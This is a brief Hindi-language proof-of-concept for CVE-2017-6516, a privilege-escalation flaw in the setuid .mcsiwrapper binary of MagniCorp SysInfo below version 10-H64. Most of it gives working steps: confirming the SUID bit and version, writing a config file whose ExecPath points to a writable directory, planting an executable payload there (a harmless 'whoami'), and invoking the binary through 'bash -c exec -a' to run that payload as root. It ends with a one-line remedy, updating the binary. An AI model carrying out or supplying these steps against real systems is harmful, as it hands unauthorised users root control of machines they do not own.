
CVE-2017-6516 का शोषण करने के लिए एक PoC / कार्यप्रणाली
CVE-2017-6516 एक विशेषाधिकार वृद्धि भेद्यता है जो MagniCorp SysInfo के .mcsiwrapper बाइनरी को लक्षित करती है जो संस्करण 10-H64 के अंतर्गत है। जब इस बाइनरी पर SUID बिट सेट हो और वह पुराना हो, तो उपयोगकर्ता बाइनरी के स्वामी के रूप में मनमाना कोड निष्पादित कर सकता है - जो अक्सर root होता है।
.mcsiwrapper में setuid होना चाहिए:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper संस्करण 10-H64 से नीचे होना चाहिए:$ .mcsiwrapper --version
<Version under 10-H64>
निम्नलिखित सामग्री के साथ एक config फ़ाइल बनाएँ:
ExecPath=<Path to a writeable directory>
ExecPath निर्देशिका में एक पेलोड निष्पादन योग्य फ़ाइल बनाएँ, उदाहरण के लिए:
#!/bin/sh
whoami
और इसे निष्पादन योग्य बनाएँ:
$ chmod +x payload
कमांड चलाएँ:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
.mcsiwrapper को कम से कम 10-H64 में अपडेट करें।